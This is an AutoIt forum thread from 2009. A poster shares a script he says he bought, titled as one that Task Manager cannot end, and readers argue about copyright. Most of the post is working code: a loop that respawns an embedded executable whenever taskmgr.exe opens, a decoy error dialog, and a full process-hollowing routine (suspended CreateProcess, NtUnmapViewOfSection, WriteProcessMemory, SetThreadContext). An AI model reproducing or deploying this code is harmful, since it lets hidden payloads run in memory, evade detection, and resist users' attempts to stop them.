买来的,给需要的朋友参考_结束不了
本帖最后由 lpxx 于 2009-11-23 21:03 编辑代码是从阿东那里买来的,阿东就是论坛热心人马甲同志,
反正俺看不懂,所以留给看得懂朋友们。
再次说明一下:原作者是阿东,不是俺,俺没这么高的能耐。#NoTrayIcon
#Region ;**** 参数创建于 ACNWrapper_GUI ****
#AutoIt3Wrapper_Res_Comment=任务管理器结束不了
#AutoIt3Wrapper_Res_Description=QQ350676
#AutoIt3Wrapper_Res_Fileversion=1.0.0.0
#AutoIt3Wrapper_Res_LegalCopyright=阿东
#EndRegion ;**** 参数创建于 ACNWrapper_GUI ****
=====================
;论坛限制,请下载附件...
=====================
Dim $Pol
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\ADP","PID","REG_SZ",@AutoItPID)
While 1
Sleep(250)
$P = ProcessExists("taskmgr.exe")
If $P <> 0 And $P <> $Pol Then
$iNewPID = _RunExeFromMemory($bBinary)
If @error Then
MsgBox(16+1,'应用程序出错','"0x00350676"指令引用的"0x00350676"内存。该内存不能为"read"。'&@CR&@CR&'要终止程序,请单击“确定”。'&@CR&'要调试程序,请单击“取消”。')
EndIf
$Pol = $P
EndIf
WEnd
Func _RunExeFromMemory($bBinaryImage)
#Region 1. PREPROCESSING PASSED
Local $bBinary = Binary($bBinaryImage) ; this is redundant but still...
; Make structure out of binary data that was passed
Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]")
DllStructSetData($tBinary, 1, $bBinary) ; fill it
; Get pointer to it
Local $pPointer = DllStructGetPtr($tBinary)
#Region 2. CREATING NEW PROCESS
; STARTUPINFO structure (actually all that really matters is allocaed space)
Local $tSTARTUPINFO = DllStructCreate("dwordcbSize;" & _
"ptr Reserved;" & _
"ptr Desktop;" & _
"ptr Title;" & _
"dword X;" & _
"dword Y;" & _
"dword XSize;" & _
"dword YSize;" & _
"dword XCountChars;" & _
"dword YCountChars;" & _
"dword FillAttribute;" & _
"dword Flags;" & _
"ushort ShowWindow;" & _
"ushort Reserved2;" & _
"ptr Reserved2;" & _
"ptr hStdInput;" & _
"ptr hStdOutput;" & _
"ptr hStdError")
; This is much important. This structure will hold very some important data.
Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _
"ptr Thread;" & _
"dword ProcessId;" & _
"dword ThreadId")
; Create new process
Local $aCall = DllCall("kernel32.dll", "int", "CreateProcessW", _
"wstr", @AutoItExe, _ ; This (or better said - another instance of me)
"ptr", 0, _
"ptr", 0, _
"ptr", 0, _
"int", 0, _
"dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential
"ptr", 0, _
"ptr", 0, _
"ptr", DllStructGetPtr($tSTARTUPINFO), _
"ptr", DllStructGetPtr($tPROCESS_INFORMATION))
If @error Or Not $aCall Then
Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
EndIf
; New process and thread handles:
Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")
Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")
#Region 3. FILL CONTEXT STRUCTURE
; CONTEXT structure is what's really important here. It's very 'misterious'
Local $tCONTEXT = DllStructCreate("dword ContextFlags;" & _
"dword Dr0;" & _
"dword Dr1;" & _
"dword Dr2;" & _
"dword Dr3;" & _
"dword Dr6;" & _
"dword Dr7;" & _
"dword ControlWord;" & _
"dword StatusWord;" & _
"dword TagWord;" & _
"dword ErrorOffset;" & _
"dword ErrorSelector;" & _
"dword DataOffset;" & _
"dword DataSelector;" & _
"byte RegisterArea;" & _
"dword Cr0NpxState;" & _
"dword SegGs;" & _
"dword SegFs;" & _
"dword SegEs;" & _
"dword SegDs;" & _
"dword Edi;" & _
"dword Esi;" & _
"dword Ebx;" & _
"dword Edx;" & _
"dword Ecx;" & _
"dword Eax;" & _ ; manipulation point (will set address of entry point here)
"dword Ebp;" & _
"dword Eip;" & _
"dword SegCs;" & _
"dword EFlags;" & _
"dword Esp;" & _
"dword SegS")
DllStructSetData($tCONTEXT, "ContextFlags", 0x10002) ; CONTEXT_INTEGER
; Fill tCONTEXT structure:
$aCall = DllCall("kernel32.dll", "int", "GetThreadContext", _
"ptr", $hThread, _
"ptr", DllStructGetPtr($tCONTEXT))
If @error Or Not $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(2, 0, 0) ; GetThreadContext function or call to it failed
EndIf
#Region 4. READ PE-FORMAT
; Start processing passed binary data. 'Reading' PE format follows.
Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic;" & _
"ushort BytesOnLastPage;" & _
"ushort Pages;" & _
"ushort Relocations;" & _
"ushort SizeofHeader;" & _
"ushort MinimumExtra;" & _
"ushort MaximumExtra;" & _
"ushort SS;" & _
"ushort SP;" & _
"ushort Checksum;" & _
"ushort IP;" & _
"ushort CS;" & _
"ushort Relocation;" & _
"ushort Overlay;" & _
"char Reserved;" & _
"ushort OEMIdentifier;" & _
"ushort OEMInformation;" & _
"char Reserved2;" & _
"dword AddressOfNewExeHeader", _
$pPointer)
; Move pointer
$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header
Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")
; Check if it's valid format
If Not ($sMagic == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(3, 0, 0) ; MS-DOS header missing. Btw 'MZ' are the initials of Mark Zbikowski in case you didn't know.
EndIf
Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)
; Move pointer
$pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure
; Check signature
If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(4, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.
EndIf
Local $tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & _
"ushort NumberOfSections;" & _
"dword TimeDateStamp;" & _
"dword PointerToSymbolTable;" & _
"dword NumberOfSymbols;" & _
"ushort SizeOfOptionalHeader;" & _
"ushort Characteristics", _
$pPointer)
; Get number of sections
Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")
; Move pointer
$pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure
Local $tIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & _
"ubyte MajorLinkerVersion;" & _
"ubyte MinorLinkerVersion;" & _
"dword SizeOfCode;" & _
"dword SizeOfInitializedData;" & _
"dword SizeOfUninitializedData;" & _
"dword AddressOfEntryPoint;" & _
"dword BaseOfCode;" & _
"dword BaseOfData;" & _
"dword ImageBase;" & _
"dword SectionAlignment;" & _
"dword FileAlignment;" & _
"ushort MajorOperatingSystemVersion;" & _
"ushort MinorOperatingSystemVersion;" & _
"ushort MajorImageVersion;" & _
"ushort MinorImageVersion;" & _
"ushort MajorSubsystemVersion;" & _
"ushort MinorSubsystemVersion;" & _
"dword Win32VersionValue;" & _
"dword SizeOfImage;" & _
"dword SizeOfHeaders;" & _
"dword CheckSum;" & _
"ushort Subsystem;" & _
"ushort DllCharacteristics;" & _
"dword SizeOfStackReserve;" & _
"dword SizeOfStackCommit;" & _
"dword SizeOfHeapReserve;" & _
"dword SizeOfHeapCommit;" & _
"dword LoaderFlags;" & _
"dword NumberOfRvaAndSizes", _
$pPointer)
; Move pointer
$pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER
Local $iMagic = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "Magic")
; Check if it's 32-bit application
If $iMagic <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(5, 0, 0) ; not 32-bit application. Structures (and sizes) are for 32-bit apps.
EndIf
; Extract entry point address
Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address
; Move pointer
$pPointer += 128 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory
Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers
#Region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED
; Clear old data. !This is where this whole function will fail with Vista and above!
$aCall = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
"ptr", $hProcess, _
"ptr", $pOptionalHeaderImageBaseNEW)
If @error Or $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(6, 0, 0) ; NtUnmapViewOfSection function or call to it failed
EndIf
#Region 6. ALLOCATE 'NEW' MEMORY SPACE
; Allocate proper size of memory at the proper place. !This is where the failure will occure if that new exe is e.g. bigger than AutoIt3.exe!
$aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
"ptr", $hProcess, _
"ptr", $pOptionalHeaderImageBaseNEW, _
"dword", $iOptionalHeaderSizeOfImageNEW, _
"dword", 12288, _ ; MEM_COMMIT|MEM_RESERVE
"dword", 64) ; PAGE_EXECUTE_READWRITE
If @error Or Not $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(7, 0, 0) ; VirtualAllocEx function or call to it failed
EndIf
Local $pRemoteCode = $aCall ; from now on this is zero-point
#Region 7. GET AND WRITE NEW PE-HEADERS
Local $pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER) ; starting address of binary image headers
Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") ; the size of the MS-DOS stub, the PE header, and the section headers
; Write NEW headers
$aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _
"ptr", $hProcess, _
"ptr", $pRemoteCode, _
"ptr", $pHEADERS_NEW, _
"dword", $iOptionalHeaderSizeOfHeadersNEW, _
"dword*", 0)
If @error Or Not $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(8, 0, 0) ; WriteProcessMemory function or call to it while writting new PE headers failed
EndIf
#Region 8. WRITE SECTIONS
; Dealing with sections. Will write them too as they hold all needed data that PE loader reads
Local $tIMAGE_SECTION_HEADER
Local $iSizeOfRawData, $pPointerToRawData
Local $iVirtualAddress
For $i = 1 To $iNumberOfSections
$tIMAGE_SECTION_HEADER = DllStructCreate("char Name;" & _
"dword UnionOfVirtualSizeAndPhysicalAddress;" & _
"dword VirtualAddress;" & _
"dword SizeOfRawData;" & _
"dword PointerToRawData;" & _
"dword PointerToRelocations;" & _
"dword PointerToLinenumbers;" & _
"ushort NumberOfRelocations;" & _
"ushort NumberOfLinenumbers;" & _
"dword Characteristics", _
$pPointer)
$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
$pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")
; If there is data to write, write it where is should be written
If $iSizeOfRawData Then
$aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _
"ptr", $hProcess, _
"ptr", $pRemoteCode + $iVirtualAddress, _
"ptr", $pPointerToRawData, _
"dword", $iSizeOfRawData, _
"dword*", 0)
If @error Or Not $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(9, $i, 0) ; WriteProcessMemory function or call to it while writting new sectuions failed
EndIf
EndIf
; Move pointer
$pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
Next
#Region 9. NEW ENTRY POINT
; Entry point manipulation
DllStructSetData($tCONTEXT, "Eax", $pRemoteCode + $iEntryPointNEW) ; $iEntryPointNEW was relative address
#Region 10. SET NEW CONTEXT
; New context:
$aCall = DllCall("kernel32.dll", "int", "SetThreadContext", _
"ptr", $hThread, _
"ptr", DllStructGetPtr($tCONTEXT))
If @error Or Not $aCall Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf
#Region 11. RESUME THREAD
; And that's it!. Continue execution
$aCall = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $hThread)
If @error Or $aCall = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf
#Region 12. RETURN SUCCESS
; All went well. Return, for example, new PID:
Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")
EndFunc ;==>_RunExeFromMemory
未完.....
停止了...
对不起各位.. 这样可以吗,如果没有经过原作者同意,最好不要将出售过的代码贴上来。 :face (33):这是什么?有什么用途呀。麻烦下次说明白一点! 这样可以吗,如果没有经过原作者同意,最好不要将出售过的代码贴上来。
pusofalse 发表于 2009-11-23 15:17 http://www.autoitx.com/images/common/back.gif
怎么去掉上传的附件呢? 下东西太花钱了。 既然是买来了,版权是不是归买的人了。为什么不能发,版主人家花了钱的。 ㄟ 這個帖子 有問題呢害我花錢下載了...... 不可以刪除掉嗎˙ 谈钱伤感情啊~~~~ 楼主, 你贴出的代码源自于英文官方论坛,
其中的函数_RunExeFromMemory和官方代码一模一样 这个太难说 了,版权纠纷,不过这个也说不清,, 看看,是什么东西 慢慢研究!~~~~ 好久的一段代码,看得头都晕了 没有用哦~~ 这东西干嘛的?
页:
[1]
2